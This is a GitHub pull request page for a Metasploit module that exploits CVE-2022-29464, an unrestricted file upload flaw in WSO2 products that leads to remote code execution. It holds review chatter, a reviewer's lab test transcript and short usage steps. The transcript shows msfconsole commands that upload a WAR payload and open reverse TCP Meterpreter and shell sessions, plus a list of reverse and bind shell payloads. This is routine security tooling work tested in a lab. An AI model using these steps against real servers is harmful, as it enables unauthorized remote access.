-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add WSO2 file upload RCE module #16507
Conversation
Hi, Jack! |
WILL!! Great to hear from you, I knew it wasn't bye forever 🎉 |
documentation/modules/exploit/multi/http/wso2_file_upload_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/wso2_file_upload_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/wso2_file_upload_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/wso2_file_upload_rce.md
Outdated
Show resolved
Hide resolved
Co-authored-by: bcoles <bcoles@gmail.com>
…it-framework into wso2-file-upload-rce
@msjenkins-r7 test this please. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Module is working great! The check method looks alot better now and the exponential backoff means I'm getting my shells alot faster. I tested both a Java Meterpreter and Java Shell payload. Everything worked perfectly. I'll get this landed in a moment.
Testing Output
msf6 exploit(multi/http/wso2_file_upload_rce) > show options
Module options (exploit/multi/http/wso2_file_upload_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 9443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Relative URI of WSO2 product installation
VHOST no HTTP server virtual host
WAR_DEPLOY_DELAY 20 yes How long to wait for the war file to deploy, in seconds
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java Dropper
msf6 exploit(multi/http/wso2_file_upload_rce) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(multi/http/wso2_file_upload_rce) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/wso2_file_upload_rce) > check
[*] 192.168.159.128:9443 - The target appears to be vulnerable.
msf6 exploit(multi/http/wso2_file_upload_rce) > edit
msf6 exploit(multi/http/wso2_file_upload_rce) > exploit
msf6 exploit(multi/http/wso2_file_upload_rce) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[*] Waiting for shell...
[*] Waiting for shell...
[*] Waiting for shell...
[*] Waiting for shell...
[+] Payload executed successfully
[*] Sending stage (58851 bytes) to 192.168.159.128
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.128:60720 ) at 2022-04-29 09:55:35 -0400
meterpreter > getuid
Server username: smcintyre
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 5.17.4-100.fc34.x86_64 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.159.128 - Meterpreter session 1 closed. Reason: User exit
[*] 192.168.159.128 - Meterpreter session 1 closed. Reason: Died
msf6 exploit(multi/http/wso2_file_upload_rce) > set PAYLOAD java/
set PAYLOAD java/jsp_shell_bind_tcp set PAYLOAD java/meterpreter/bind_tcp set PAYLOAD java/meterpreter/reverse_https set PAYLOAD java/shell/bind_tcp set PAYLOAD java/shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp set PAYLOAD java/meterpreter/reverse_http set PAYLOAD java/meterpreter/reverse_tcp set PAYLOAD java/shell/reverse_tcp
msf6 exploit(multi/http/wso2_file_upload_rce) > set PAYLOAD java/shell/reverse_tcp
PAYLOAD => java/shell/reverse_tcp
msf6 exploit(multi/http/wso2_file_upload_rce) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[*] Waiting for shell...
[*] Waiting for shell...
[+] Payload executed successfully
[*] Sending stage (2952 bytes) to 192.168.159.128
[*] Command shell session 2 opened (192.168.159.128:4444 -> 192.168.159.128:60722 ) at 2022-04-29 09:56:25 -0400
id
uid=1000(smcintyre) gid=1000(smcintyre) groups=1000(smcintyre),10(wheel),973(docker),975(wireshark)
pwd
/home/smcintyre/Downloads/wso2am-4.0.0
exit
[*] 192.168.159.128 - Command shell session 2 closed.
msf6 exploit(multi/http/wso2_file_upload_rce) >
Release NotesThis adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution. |
Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a
java/meterpreter/reverse_tcp
payload inside a war file and uploads it to the target via the vulnerable file upload. It then executes the payload and receives a shell.Verification
List the steps needed to make sure this thing works
use multi/http/wso2_file_upload_rce
set rhosts [ip]
set lhost [ip]
run